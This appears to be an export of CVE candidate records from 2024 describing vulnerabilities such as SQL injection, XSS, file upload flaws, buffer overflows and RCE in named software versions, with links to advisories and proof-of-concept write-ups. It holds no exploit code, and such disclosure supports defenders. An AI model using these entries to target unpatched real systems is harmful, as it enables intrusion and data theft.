CVE 2024 25451 Candidate Bento4 v1.6.0-640 was discovered to contain an out-of-memory bug via the AP4_DataBuffer::ReallocateBuffer() function. MISC:https://github.com/axiomatic-systems/Bento4/issues/872 Assigned (20240207)
CVE 2024 25450 Candidate imlib2 v1.9.1 was discovered to mishandle memory allocation in the function init_imlib_fonts(). MISC:https://git.enlightenment.org/old/legacy-imlib2/issues/20 | MISC:https://github.com/derf/feh/issues/712 Assigned (20240207)
CVE 2024 2545 Candidate ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2024-1730. Reason: This candidate is a duplicate of CVE-2024-1730. Notes: All CVE users should reference CVE-2024-1730 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. Assigned (20240315)
CVE 2024 25448 Candidate An issue in the imlib_free_image_and_decache function of imlib2 v1.9.1 allows attackers to cause a heap buffer overflow via parsing a crafted image. MISC:https://git.enlightenment.org/old/legacy-imlib2/issues/20 | MISC:https://github.com/derf/feh/issues/711 Assigned (20240207)
CVE 2024 25447 Candidate An issue in the imlib_load_image_with_error_return function of imlib2 v1.9.1 allows attackers to cause a heap buffer overflow via parsing a crafted image. MISC:https://git.enlightenment.org/old/legacy-imlib2/issues/20 | MISC:https://github.com/derf/feh/issues/709 Assigned (20240207)
CVE 2024 25446 Candidate An issue in the HuginBase::PTools::setDestImage function of Hugin v2022.0.0 allows attackers to cause a heap buffer overflow via parsing a crafted image. FEDORA:FEDORA-2024-60cefb07e8 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NAV7IMHCOIMBEIW42KM2QUJ4MDQLNW3Z/ | MISC:https://bugs.launchpad.net/hugin/+bug/2025037 Assigned (20240207)
CVE 2024 25445 Candidate Improper handling of values in HuginBase::PTools::Transform::transform of Hugin 2022.0.0 leads to an assertion failure. FEDORA:FEDORA-2024-60cefb07e8 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NAV7IMHCOIMBEIW42KM2QUJ4MDQLNW3Z/ | MISC:https://bugs.launchpad.net/hugin/+bug/2025038 Assigned (20240207)
CVE 2024 25443 Candidate An issue in the HuginBase::ImageVariable<double>::linkWith function of Hugin v2022.0.0 allows attackers to cause a heap-use-after-free via parsing a crafted image. FEDORA:FEDORA-2024-60cefb07e8 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NAV7IMHCOIMBEIW42KM2QUJ4MDQLNW3Z/ | MISC:https://bugs.launchpad.net/hugin/+bug/2025035 Assigned (20240207)
CVE 2024 25442 Candidate An issue in the HuginBase::PanoramaMemento::loadPTScript function of Hugin v2022.0.0 allows attackers to cause a heap buffer overflow via parsing a crafted image. FEDORA:FEDORA-2024-60cefb07e8 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NAV7IMHCOIMBEIW42KM2QUJ4MDQLNW3Z/ | MISC:https://bugs.launchpad.net/hugin/+bug/2025032 Assigned (20240207)
CVE 2024 25438 Candidate A cross-site scripting (XSS) vulnerability in the Submission module of Pkp Ojs v3.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Input subject field under the Add Discussion function. MISC:https://drive.google.com/file/d/1-9yUkbsQ-blYpTsdZoXfu3ALBA5wQCbG/view?usp=sharing | MISC:https://github.com/machisri/CVEs-and-Vulnerabilities/blob/main/CVE-2024-25438%20-%3E%20Stored%20XSS%20in%20input%20Subject%20of%20the%20Add%20Discussion%20Component%20under%20Submissions Assigned (20240207)
CVE 2024 25436 Candidate A cross-site scripting (XSS) vulnerability in the Production module of Pkp Ojs v3.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Input subject field under the Add Discussion function. MISC:https://drive.google.com/file/d/1nSC8OlxsEnOajZ2JYuwoKFZqyB764WkL/view?usp=drivesdk | MISC:https://github.com/machisri/CVEs-and-Vulnerabilities/blob/main/CVE-2024-25438%20-%3E%20Stored%20XSS%20in%20input%20Subject%20of%20the%20Add%20Discussion%20Component%20under%20Submissions Assigned (20240207)
CVE 2024 25435 Candidate A cross-site scripting (XSS) vulnerability in Md1health Md1patient v2.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Msg parameter. MISC:https://github.com/machisri/CVEs-and-Vulnerabilities/blob/main/CVE-2024-25435%20-%3E%20Reflected%20XSS%20on%20md1patient%20login%20page Assigned (20240207)
CVE 2024 25434 Candidate A cross-site scripting (XSS) vulnerability in Pkp Ojs v3.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Publicname parameter. MISC:https://drive.google.com/file/d/1MFuAyZukdJeA7HKz8o8pOKLJMjURTZCt/view?usp=sharing | MISC:https://github.com/machisri/CVEs-and-Vulnerabilities/blob/main/CVE-2024-25434%20-%3E%20Stored%20XSS%20in%20input%20public%20name%20of%20the%20Component Assigned (20240207)
CVE 2024 25428 Candidate SQL Injection vulnerability in MRCMS v3.1.2 allows attackers to run arbitrary system commands via the status parameter. MISC:https://github.com/wuweiit/mushroom/issues/19 Assigned (20240207)
CVE 2024 25423 Candidate An issue in MAXON CINEMA 4D R2024.2.0 allows a local attacker to execute arbitrary code via a crafted c4d_base.xdl64 file. MISC:http://cinema.com | MISC:http://maxon.com | MISC:https://github.com/DriverUnload/cve-2024-25423 Assigned (20240207)
CVE 2024 25422 Candidate SQL Injection vulnerability in SEMCMS v.4.8 allows a remote attacker to execute arbitrary code and obtain sensitive information via the SEMCMS_Menu.php component. MISC:https://github.com/tzyyyyyyy/semcms Assigned (20240207)
CVE 2024 25419 Candidate flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/update_menu.php. MISC:https://github.com/Carl0724/cms/blob/main/1.md Assigned (20240207)
CVE 2024 25418 Candidate flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/delete_menu.php. MISC:https://github.com/Carl0724/cms/blob/main/2.md Assigned (20240207)
CVE 2024 25417 Candidate flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/add_translation.php. MISC:https://github.com/Carl0724/cms/blob/main/3.md Assigned (20240207)
CVE 2024 25415 Candidate A remote code execution (RCE) vulnerability in /admin/define_language.php of CE Phoenix v1.0.8.20 allows attackers to execute arbitrary PHP code via injecting a crafted payload into the file english.php. MISC:https://github.com/capture0x/Phoenix | MISC:https://packetstormsecurity.com/files/175913/CE-Phoenix-1.0.8.20-Remote-Command-Execution.html | MISC:https://vulners.com/zdt/1337DAY-ID-39172 Assigned (20240207)
CVE 2024 25414 Candidate An arbitrary file upload vulnerability in /admin/upgrade of CSZ CMS v1.3.0 allows attackers to execute arbitrary code via uploading a crafted Zip file. MISC:https://github.com/capture0x/CSZ_CMS | MISC:https://packetstormsecurity.com/files/175889/CSZ-CMS-1.3.0-Shell-Upload.html Assigned (20240207)
CVE 2024 25413 Candidate A XSLT Server Side injection vulnerability in the Import Jobs function of FireBear Improved Import And Export v3.8.6 allows attackers to execute arbitrary commands via a crafted XSLT file. MISC:https://github.com/capture0x/Magento-ver.-2.4.6 | MISC:https://packetstormsecurity.com/files/175801/FireBear-Improved-Import-And-Export-3.8.6-XSLT-Server-Side-Injection.html Assigned (20240207)
CVE 2024 25410 Candidate flusity-CMS 2.33 is vulnerable to Unrestricted Upload of File with Dangerous Type in update_setting.php. MISC:https://github.com/flusity/flusity-CMS/issues/9 Assigned (20240207)
CVE 2024 25407 Candidate SteVe v3.6.0 was discovered to use predictable transaction ID's when receiving a StartTransaction request. This vulnerability can allow attackers to cause a Denial of Service (DoS) by using the predicted transaction ID's to terminate other transactions. MISC:https://github.com/steve-community/steve/issues/1296 Assigned (20240207)
CVE 2024 25400 Candidate Subrion CMS 4.2.1 is vulnerable to SQL Injection via ia.core.mysqli.php. MISC:https://cwe.mitre.org/data/definitions/89.html | MISC:https://github.com/intelliants/subrion/issues/910 | MISC:https://subrion.org/ Assigned (20240207)
CVE 2024 25399 Candidate Subrion CMS 4.2.1 is vulnerable to Cross Site Scripting (XSS) via adminer.php. MISC:https://cwe.mitre.org/data/definitions/79 Assigned (20240207)
CVE 2024 25398 Candidate In Srelay (the SOCKS proxy and Relay) v.0.4.8p3, a specially crafted network payload can trigger a denial of service condition and disrupt the service. MISC:https://github.com/Nivedita-22/SRELAY-exploit-writeup/blob/main/Srelay.md | MISC:https://sourceforge.net/projects/socks-relay/ Assigned (20240207)
CVE 2024 25386 Candidate Directory Traversal vulnerability in DICOM® Connectivity Framework by laurelbridge before v.2.7.6b allows a remote attacker to execute arbitrary code via the format_logfile.pl file. MISC:https://gist.github.com/Shulelk/15c9ba8d6b54dd4256a50a24ac7dd0a2 | MISC:https://laurelbridge.com/security-notice-cve-2024-25386-potential-vulnerability/ | MISC:https://sec.1i6w31fen9.top/2024/02/02/dcf-operations-window-remote-command-execute/ Assigned (20240207)
CVE 2024 25385 Candidate An issue in flvmeta v.1.2.2 allows a local attacker to cause a denial of service via the flvmeta/src/flv.c:375:21 function in flv_close. MISC:https://github.com/hanxuer/crashes/blob/main/flvmeta/01/readme.md | MISC:https://github.com/noirotm/flvmeta/issues/23 Assigned (20240207)
CVE 2024 25381 Candidate There is a Stored XSS Vulnerability in Emlog Pro 2.2.8 Article Publishing, due to non-filtering of quoted content. MISC:https://github.com/Ox130e07d/CVE-2024-25381/blob/main/description | MISC:https://github.com/emlog/emlog/issues/285 Assigned (20240207)
CVE 2024 2538 Candidate The Permalink Manager Lite plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ajax_save_permalink' function in all versions up to, and including, 2.4.3.1. This makes it possible for authenticated attackers, with author access and above, to modify the permalinks of arbitrary posts. MISC:https://gist.github.com/Xib3rR4dAr/b1eec00e844932c6f2f30a63024b404e | URL:https://gist.github.com/Xib3rR4dAr/b1eec00e844932c6f2f30a63024b404e | MISC:https://plugins.trac.wordpress.org/changeset/3052848#file35 | URL:https://plugins.trac.wordpress.org/changeset/3052848#file35 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/70cd028d-122d-4e3c-ac09-150dec07a2cd?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/70cd028d-122d-4e3c-ac09-150dec07a2cd?source=cve Assigned (20240315)
CVE 2024 25373 Candidate Tenda AC10V4.0 V16.03.10.20 was discovered to contain a stack overflow via the page parameter in the sub_49B384 function. MISC:https://github.com/cvdyfbwa/IoT-Tenda-Router/blob/main/sub_49B384.md Assigned (20240207)
CVE 2024 2537 Candidate Improper Control of Dynamically-Managed Code Resources vulnerability in Logitech Logi Tune on MacOS allows Local Code Inclusion. MISC:https://hackerone.com/reports/2376663 | URL:https://hackerone.com/reports/2376663 Assigned (20240315)
CVE 2024 25369 Candidate A reflected Cross-Site Scripting (XSS) vulnerability in FUEL CMS 1.5.2allows attackers to run arbitrary code via crafted string after the group_id parameter. MISC:https://github.com/liyako/vulnerability/blob/main/POC/FUEL%20CMS%20Reflected%20Cross-Site%20Scripting%20(XSS).md Assigned (20240207)
CVE 2024 25366 Candidate Buffer Overflow vulnerability in mz-automation.de libiec61859 v.1.4.0 allows a remote attacker to cause a denial of service via the mmsServer_handleGetNameListRequest function to the mms_getnamelist_service component. MISC:https://github.com/mz-automation/libiec61850 | MISC:https://github.com/mz-automation/libiec61850/issues/492 | MISC:https://www.mz-automation.de/ Assigned (20240207)
CVE 2024 25360 Candidate A hidden interface in Motorola CX2L Router firmware v1.0.1 leaks information regarding the SystemWizardStatus component via sending a crafted request to device_web_ip. MISC:https://github.com/leetsun/Hints/tree/main/moto-CX2L/4 Assigned (20240207)
CVE 2024 25359 Candidate An issue in zuoxingdong lagom v.0.1.2 allows a local attacker to execute arbitrary code via the pickle_load function of the serialize.py file. MISC:https://github.com/bayuncao/vul-cve-10 Assigned (20240207)
CVE 2024 25351 Candidate SQL Injection vulnerability in /zms/admin/changeimage.php in PHPGurukul Zoo Management System 1.0 allows attackers to run arbitrary SQL commands via the editid parameter. MISC:https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/ZooManagementSystem-SQL_Injection_Change_Image.md Assigned (20240207)
CVE 2024 25350 Candidate SQL Injection vulnerability in /zms/admin/edit-ticket.php in PHPGurukul Zoo Management System 1.0 via tickettype and tprice parameters. MISC:https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/ZooManagementSystem-SQL_Injection_Edit_Ticket.md Assigned (20240207)
CVE 2024 2535 Candidate A vulnerability has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/users.php. The manipulation of the argument id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256972. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256972 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256972 | MISC:VDB-256972 | MAGESH-K21 Online-College-Event-Hall-Reservation-System users.php cross site scripting | URL:https://vuldb.com/?id.256972 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20users.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20users.php.md Assigned (20240315)
CVE 2024 25344 Candidate Cross Site Scripting vulnerability in ITFlow.org before commit v.432488eca3998c5be6b6b9e8f8ba01f54bc12378 allows a remtoe attacker to execute arbitrary code and obtain sensitive information via the settings.php, settings+company.php, settings_defaults.php,settings_integrations.php, settings_invoice.php, settings_localization.php, settings_mail.php components. MISC:https://github.com/itflow-org/itflow/commit/432488eca3998c5be6b6b9e8f8ba01f54bc12378 | MISC:https://github.com/itflow-org/itflow/commit/8068cb6081e4760860a634c1066b2c64d0ee2d46 | MISC:https://itflow.org/ | MISC:https://packetstormsecurity.com/files/177224/ITFlow-Cross-Site-Request-Forgery.html Assigned (20240207)
CVE 2024 2534 Candidate A vulnerability, which was classified as critical, was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. This affects an unknown part of the file /admin/users.php. The manipulation of the argument user_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256971. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256971 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256971 | MISC:VDB-256971 | MAGESH-K21 Online-College-Event-Hall-Reservation-System users.php sql injection | URL:https://vuldb.com/?id.256971 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20users.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20users.php.md Assigned (20240315)
CVE 2024 25331 Candidate DIR-822 Rev. B Firmware v2.02KRB09 and DIR-822-CA Rev. B Firmware v2.03WWb01 suffer from a LAN-Side Unauthenticated Remote Code Execution (RCE) vulnerability elevated from HNAP Stack-Based Buffer Overflow. MISC:https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10372 | MISC:https://www.ensigninfosecurity.com/advisories/vulnerability-advisories/2 Assigned (20240207)
CVE 2024 2533 Candidate A vulnerability, which was classified as problematic, has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. Affected by this issue is some unknown functionality of the file /admin/update-users.php. The manipulation of the argument id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256970 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256970 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256970 | MISC:VDB-256970 | MAGESH-K21 Online-College-Event-Hall-Reservation-System update-users.php cross site scripting | URL:https://vuldb.com/?id.256970 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20update-users.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20update-users.php.md Assigned (20240315)
CVE 2024 25327 Candidate Cross Site Scripting (XSS) vulnerability in Justice Systems FullCourt Enterprise v.8.2 allows a remote attacker to execute arbitrary code via the formatCaseNumber parameter of the Citation search function. MISC:https://packetstormsecurity.com/files/177500/FullCourt-Enterprise-8.2-Cross-Site-Scripting.html Assigned (20240207)
CVE 2024 25325 Candidate SQL injection vulnerability in Employee Management System v.1.0 allows a local attacker to obtain sensitive information via a crafted payload to the txtemail parameter in the login.php. MISC:https://cxsecurity.com/issue/WLB-2024020062 Assigned (20240207)
CVE 2024 25320 Candidate Tongda OA v2017 and up to v11.9 was discovered to contain a SQL injection vulnerability via the $AFF_ID parameter at /affair/delete.php. MISC:https://github.com/cqliuke/cve/blob/main/sql.md Assigned (20240207)
CVE 2024 2532 Candidate A vulnerability classified as critical was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/update-users.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256969 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256969 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256969 | MISC:VDB-256969 | MAGESH-K21 Online-College-Event-Hall-Reservation-System update-users.php sql injection | URL:https://vuldb.com/?id.256969 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20update-users.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20update-users.php.md Assigned (20240315)
CVE 2024 25318 Candidate Code-projects Hotel Managment System 1.0 allows SQL Injection via the 'pid' parameter in Hotel/admin/print.php?pid=2. MISC:https://github.com/tubakvgc/CVEs/blob/main/Hotel%20Managment%20System/Hotel%20Managment%20System%20-%20SQL%20Injection-3.md Assigned (20240207)
CVE 2024 25316 Candidate Code-projects Hotel Managment System 1.0 allows SQL Injection via the 'eid' parameter in Hotel/admin/usersettingdel.php?eid=2. MISC:https://github.com/tubakvgc/CVEs/blob/main/Hotel%20Managment%20System/Hotel%20Managment%20System%20-%20SQL%20Injection-4.md Assigned (20240207)
CVE 2024 25315 Candidate Code-projects Hotel Managment System 1.0, allows SQL Injection via the 'rid' parameter in Hotel/admin/roombook.php?rid=2. MISC:https://github.com/tubakvgc/CVEs/blob/main/Hotel%20Managment%20System/Hotel%20Managment%20System%20-%20SQL%20Injection-1.md Assigned (20240207)
CVE 2024 25314 Candidate Code-projects Hotel Managment System 1.0, allows SQL Injection via the 'sid' parameter in Hotel/admin/show.php?sid=2. MISC:https://github.com/tubakvgc/CVEs/blob/main/Hotel%20Managment%20System/Hotel%20Managment%20System%20-%20SQL%20Injection-2.md Assigned (20240207)
CVE 2024 25313 Candidate Code-projects Simple School Managment System 1.0 allows Authentication Bypass via the username and password parameters at School/teacher_login.php. MISC:https://github.com/tubakvgc/CVEs/blob/main/Simple%20School%20Management%20System/Simple%20School%20Managment%20System%20-%20Authentication%20Bypass%20-%202.md Assigned (20240207)
CVE 2024 25312 Candidate Code-projects Simple School Managment System 1.0 allows SQL Injection via the 'id' parameter at "School/sub_delete.php?id=5." MISC:https://github.com/tubakvgc/CVEs/blob/main/Simple%20School%20Management%20System/Simple%20School%20Managment%20System%20-%20SQL%20Injection%20-5.md Assigned (20240207)
CVE 2024 25310 Candidate Code-projects Simple School Managment System 1.0 allows SQL Injection via the 'id' parameter at "School/delete.php?id=5." MISC:https://github.com/tubakvgc/CVEs/blob/main/Simple%20School%20Management%20System/Simple%20School%20Managment%20System%20-%20SQL%20Injection%20-3.md Assigned (20240207)
CVE 2024 2531 Candidate A vulnerability classified as critical has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. Affected is an unknown function of the file /admin/update-rooms.php. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256968. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256968 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256968 | MISC:VDB-256968 | MAGESH-K21 Online-College-Event-Hall-Reservation-System update-rooms.php unrestricted upload | URL:https://vuldb.com/?id.256968 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Arbitrary%20File%20Upload%20-%20update-rooms.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Arbitrary%20File%20Upload%20-%20update-rooms.php.md Assigned (20240315)
CVE 2024 25309 Candidate Code-projects Simple School Managment System 1.0 allows SQL Injection via the 'pass' parameter at School/teacher_login.php. MISC:https://github.com/tubakvgc/CVEs/blob/main/Simple%20School%20Management%20System/Simple%20School%20Managment%20System%20-%20SQL%20Injection%20-7.md Assigned (20240207)
CVE 2024 25308 Candidate Code-projects Simple School Managment System 1.0 allows SQL Injection via the 'name' parameter at School/teacher_login.php. MISC:https://github.com/tubakvgc/CVEs/blob/main/Simple%20School%20Management%20System/Simple%20School%20Managment%20System%20-%20SQL%20Injection%20-6.md Assigned (20240207)
CVE 2024 25307 Candidate Code-projects Cinema Seat Reservation System 1.0 allows SQL Injection via the 'id' parameter at "/Cinema-Reservation/booking.php?id=1." MISC:https://github.com/tubakvgc/CVEs/blob/main/Cinema%20Seat%20Reservation%20System/Cinema%20Seat%20Reservation%20System%20-%20SQL%20Injection.md Assigned (20240207)
CVE 2024 25306 Candidate Code-projects Simple School Managment System 1.0 allows SQL Injection via the 'aname' parameter at "School/index.php". MISC:https://github.com/tubakvgc/CVEs/blob/main/Simple%20School%20Management%20System/Simple%20School%20Managment%20System%20-%20SQL%20Injection%20-1.md Assigned (20240207)
CVE 2024 25305 Candidate Code-projects Simple School Managment System 1.0 allows Authentication Bypass via the username and password parameters at School/index.php. MISC:https://github.com/tubakvgc/CVEs/blob/main/Simple%20School%20Management%20System/Simple%20School%20Managment%20System%20-%20Authentication%20Bypass.md Assigned (20240207)
CVE 2024 25304 Candidate Code-projects Simple School Managment System 1.0 allows SQL Injection via the 'apass' parameter at "School/index.php." MISC:https://github.com/tubakvgc/CVEs/blob/main/Simple%20School%20Management%20System/Simple%20School%20Managment%20System%20-%20SQL%20Injection%20-2.md Assigned (20240207)
CVE 2024 25302 Candidate Sourcecodester Event Student Attendance System 1.0, allows SQL Injection via the 'student' parameter. MISC:https://github.com/tubakvgc/CVE/blob/main/Event_Student_Attendance_System.md Assigned (20240207)
CVE 2024 25301 Candidate Redaxo v5.15.1 was discovered to contain a remote code execution (RCE) vulnerability via the component /pages/templates.php. MISC:https://github.com/WoodManGitHub/MyCVEs/blob/main/2024-REDAXO/RCE.md | MISC:https://github.com/evildrummer/MyOwnCVEs/tree/main/CVE-2021-39459 Assigned (20240207)
CVE 2024 25300 Candidate A cross-site scripting (XSS) vulnerability in Redaxo v5.15.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter in the Template section. MISC:https://github.com/WoodManGitHub/MyCVEs/blob/main/2024-REDAXO/XSS.md Assigned (20240207)
CVE 2024 2530 Candidate A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/update-rooms.php. The manipulation of the argument id leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256967. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256967 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256967 | MISC:VDB-256967 | MAGESH-K21 Online-College-Event-Hall-Reservation-System update-rooms.php cross site scripting | URL:https://vuldb.com/?id.256967 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20update-rooms.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20update-rooms.php.md Assigned (20240315)
CVE 2024 25298 Candidate An issue was discovered in REDAXO version 5.15.1, allows attackers to execute arbitrary code and obtain sensitive information via modules.modules.php. MISC:https://github.com/CpyRe/I-Find-CVE-2024/blob/main/REDAXO%20RCE.md Assigned (20240207)
CVE 2024 25297 Candidate Cross Site Scripting (XSS) vulnerability in Bludit CMS version 3.15, allows remote attackers to execute arbitrary code and obtain sensitive information via edit-content.php. MISC:https://github.com/CpyRe/I-Find-CVE-2024/blob/main/BLUDIT%20Stored%20XSS.md Assigned (20240207)
CVE 2024 25294 Candidate An SSRF issue in REBUILD v.3.5 allows a remote attacker to obtain sensitive information and execute arbitrary code via the FileDownloader.java, proxyDownload,URL parameters. MISC:http://rebuild.com | MISC:https://deeply-capri-1c8.notion.site/REBUILD-V3-5-2023-12-11-SSRF-30324be04e00477eae472bf75f4f5e0d | MISC:https://github.com/getrebuild/rebuild/ Assigned (20240207)
CVE 2024 25293 Candidate mjml-app versions 3.0.4 and 3.1.0-beta were discovered to contain a remote code execution (RCE) via the href attribute. MISC:https://github.com/EQSTLab/PoC/tree/main/2024/LCE/CVE-2024-25293 Assigned (20240207)
CVE 2024 25292 Candidate Cross-site scripting (XSS) vulnerability in RenderTune v1.1.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Upload Title parameter. MISC:https://github.com/ji-zzang/EQST-PoC/tree/main/2024/RCE/CVE-2024-25292 Assigned (20240207)
CVE 2024 25291 Candidate Deskfiler v1.2.3 allows attackers to execute arbitrary code via uploading a crafted plugin. MISC:https://github.com/ji-zzang/EQST-PoC/tree/main/2024/RCE/CVE-2024-25291 Assigned (20240207)
CVE 2024 2529 Candidate A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/rooms.php. The manipulation leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256966 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256966 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256966 | MISC:VDB-256966 | MAGESH-K21 Online-College-Event-Hall-Reservation-System rooms.php unrestricted upload | URL:https://vuldb.com/?id.256966 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Arbitrary%20File%20Upload%20-%20rooms.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Arbitrary%20File%20Upload%20-%20rooms.php.md Assigned (20240315)
CVE 2024 25288 Candidate SLIMS (Senayan Library Management Systems) 9 Bulian v9.6.1 is vulnerable to SQL Injection via pop-scope-vocabolary.php. MISC:https://github.com/Vuln0wned/slims_owned/blob/main/slims/slims9-bulian-9.6.1-SQLI-pop_scope_vocabolary.md | MISC:https://github.com/slims/slims9_bulian/issues/229 Assigned (20240207)
CVE 2024 2528 Candidate A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/update-rooms.php. The manipulation of the argument room_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256965 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256965 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256965 | MISC:VDB-256965 | MAGESH-K21 Online-College-Event-Hall-Reservation-System update-rooms.php sql injection | URL:https://vuldb.com/?id.256965 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20update-rooms.php.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20-%20update-rooms.php.md Assigned (20240315)
CVE 2024 25274 Candidate An arbitrary file upload vulnerability in the component /sysFile/upload of Novel-Plus v4.3.0-RC1 allows attackers to execute arbitrary code via uploading a crafted file. MISC:https://gist.github.com/capable-Hub/725c294f1aeac729fa314a32fef55d5a | MISC:https://reference1.example.com/login Assigned (20240207)
